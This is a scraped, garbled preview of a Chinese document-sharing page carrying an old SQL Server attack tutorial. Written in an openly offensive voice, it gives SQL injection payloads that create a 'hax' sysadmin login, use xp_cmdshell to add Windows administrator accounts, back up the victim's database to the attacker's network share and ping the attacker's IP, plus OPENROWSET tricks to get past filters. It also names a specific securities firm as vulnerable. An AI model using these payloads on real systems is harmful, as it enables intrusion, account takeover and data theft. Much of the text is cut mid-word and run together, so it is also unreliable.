>教育資源庫  編者:如何保障aster.dbo.sp_addloginhax;--  neaster.dbo.sp_passaster.dbo.sp_addsrvrolemem">
sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊

sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊

ID:22674774

大?。?4.00 KB

頁數(shù):9頁

時間:2018-10-30

sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊_第1頁
sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊_第2頁
sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊_第3頁
sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊_第4頁
sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊_第5頁
資源描述:

《sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊》由會員上傳分享,免費在線閱讀,更多相關(guān)內(nèi)容在學(xué)術(shù)論文-天天文庫

1、SQLServer安全專題SQLServer數(shù)據(jù)庫的一些攻擊>>教育資源庫  編者:如何保障aster.dbo.sp_addloginhax;--  neaster.dbo.sp_passaster.dbo.sp_addsrvrolemembersysadminhax;--  neaster.dbo.xp_cmdshell'userhaxhax/es:all/passaster.dbo.xp_cmdshell'localgroupadministratorshax/add';--  這樣,你在他的數(shù)據(jù)庫和系統(tǒng)內(nèi)都留下了hax管理員賬號了  當(dāng)

2、然,前提條件是ASP用管理員賬號,所以虛擬空間大家就別試了,不會存在這個漏洞的。  以后我們會討論,如果對方的ASP不是用SQL管理員賬號,我們?nèi)绾稳肭?,?dāng)然也會涉及到1433端口的入侵  當(dāng)然大家可以試試看在id=2后面加上一個'符號,主要看對方的ASP怎么寫了  再說說當(dāng)ASP程序使用的SQL賬號不是管理員的時候我們該如何做。  假設(shè)有如下頁面  nee()函數(shù)吧  打開你的queryanalyzer,看看printdb_name(),呵呵,當(dāng)前的數(shù)據(jù)庫名就出來了  以次類推,如下:declareasysname;seta=db_name();backu

3、pdatabaseatodisk='你的IP你的共享目錄bak.dat',name='test';--  呵呵,他的當(dāng)前數(shù)據(jù)庫就備份到你的硬盤上了,接下來要做的大家心里都明白了吧  同理這個方法可以找到對方的SQL的IP  先裝一個防火墻,打開ICMP和139TCP和445TCP的警告提示  然后試試看neaster.dbo.xp_cmdshell'ping你的IP'  如果防火墻提示有人ping你,那么因該可以肯定對方的ASP用的是SQL的管理員權(quán)限,同時也確定了對方的SQLServer的準(zhǔn)確位置,因為很多大一點的網(wǎng)

4、站考慮性能,會把dshell了,該怎么辦?  別著急,試試看這個nee();backupdatabaseatodisk='你的IP你的共享目錄bak.dat',name='test';--123下一頁>>>>這篇文章來自..,。呵呵,你的防火墻該發(fā)出警告了,有人連接你的445或139(dshell這些關(guān)鍵字了  所有以上url希望大家通過vbscript提交,因為瀏覽器的地址欄會屏蔽一些特殊字符,這樣你的命令就不能完整傳輸了  dshell調(diào)用限制很大,其實這里面還有很多值得深入的地方比如  .guosen..。國信證卷就有這個問題,

5、而且他們采用ms的三層結(jié)構(gòu)作的用以前說的xp_cmdshell做法就不行了,字符串會被過濾,但是  我嘗試了,用sql的異類請求仍然可以在對方的機(jī)器上開啟tel服務(wù)和administrators組的賬號!由于對方防火墻很嚴(yán)checkpoint數(shù)據(jù)報進(jìn)出  都只開放80端口,因此,要想獲得他的數(shù)據(jù)庫結(jié)構(gòu)比較困難了,但是還是有辦法可以做到的:P  順便提醒大家注意一下關(guān)于sqloledb,db_name,openroopenroyserver';'sa';'','select*fromtable')  可見(即使從

6、字面意義上看)openrodshell呢?答案是肯定的!  select*fromopenrotonlyoffexecmaster.dbo.xp_cmdshell''dirc:''')  必須加上setfmtonlyoff用來屏蔽默認(rèn)的只返回列信息的設(shè)置,這樣xp_cmdshell返回的output集合就會提交給前面的select顯示,如果采用默認(rèn)設(shè)置,會返回空集合導(dǎo)致select出錯,命令也就無法執(zhí)行了?! ∧敲慈绻覀円{(diào)用sp_addlogin呢,他不會像xp_cmdshell返回任何集合的,我們就不能再依靠fmtonl

7、y設(shè)置了,可以如下操作  select*fromopenroaster.dbo.sp_addloginHectic')  這樣,命令至少會返回select'OK!'的集合,你的機(jī)器商會顯示OK!,同時對方的數(shù)據(jù)庫內(nèi)也會增加一個Hectic的賬號,也就是說,我們利用  select'OK!'的返回集合欺騙了本地的select請求,是命令能夠正常執(zhí)行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于  這個方法真正的用處,大家慢慢想吧:P  2。關(guān)于msdasql兩次請求的問題  不

當(dāng)前文檔最多預(yù)覽五頁,下載文檔查看全文

此文檔下載收益歸作者所有

當(dāng)前文檔最多預(yù)覽五頁,下載文檔查看全文
溫馨提示:
1. 部分包含數(shù)學(xué)公式或PPT動畫的文件,查看預(yù)覽時可能會顯示錯亂或異常,文件下載后無此問題,請放心下載。
2. 本文檔由用戶上傳,版權(quán)歸屬用戶,天天文庫負(fù)責(zé)整理代發(fā)布。如果您對本文檔版權(quán)有爭議請及時聯(lián)系客服。
3. 下載前請仔細(xì)閱讀文檔內(nèi)容,確認(rèn)文檔內(nèi)容符合您的需求后進(jìn)行下載,若出現(xiàn)內(nèi)容與標(biāo)題不符可向本站投訴處理。
4. 下載文檔時可能由于網(wǎng)絡(luò)波動等原因無法下載或下載錯誤,付費完成后未能成功下載的用戶請聯(lián)系客服處理。